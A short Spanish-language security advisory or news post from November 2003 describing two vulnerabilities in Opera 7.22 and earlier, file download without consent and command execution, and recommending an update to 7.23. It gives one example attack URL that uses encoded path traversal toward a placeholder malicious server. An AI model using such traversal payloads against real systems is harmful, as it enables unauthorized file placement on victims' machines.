2 nuevas vulnerabilidad en el navegador Opera.
24 de Noviembre de 2003
Se a descubierto dos fallos en el navegador Opera que permite la descarga de un fichero sin el permiso del usuario y la ejecución de comandos.
Las versiones afectadas son la v.7.22 y anteriores.Una de las vulnerabilidades afecta tanto a Windows como a Linux y permite la ejecución de código.
La segunda vulnerabilidad afecta solo a Windows y tiene que visitar una web hecha a propósito para que la víctima le descargue en fichero sin el permiso del usuario de la máquina.
Este es un simple ejemplo del fallo;
http://[server_malicioso]/..%5c..%5c..%5c..%5cskin.zip
Solución;
Actualizar a la versión v.7.23
http://www.opera.com/download/
Mas información;
Sistemas Linux / http://www.opera.com/linux/changelogs/723/
Sistemas Windows / http://www.opera.com/windows/changelogs/723/